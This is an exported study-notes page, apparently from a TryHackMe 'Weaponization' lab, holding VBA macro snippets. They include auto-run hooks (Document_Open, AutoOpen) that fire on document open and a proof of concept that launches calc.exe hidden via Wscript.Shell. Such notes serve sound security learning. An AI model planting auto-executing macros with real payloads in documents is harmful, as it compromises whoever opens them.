<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>VBA</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>VBA</h1>

      <div class="ck-content"><pre><code class="language-text-vbscript">Sub THM()
  MsgBox ("Welcome to Weaponization Room!")
End Sub
###########
Sub Document_Open()
  THM
End Sub

Sub AutoOpen()
  THM
End Sub

Sub THM()
   MsgBox ("Welcome to Weaponization Room!")
End Sub
##############
Sub PoC()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub</code></pre>
      </div>
    </div>
  </body>

</html>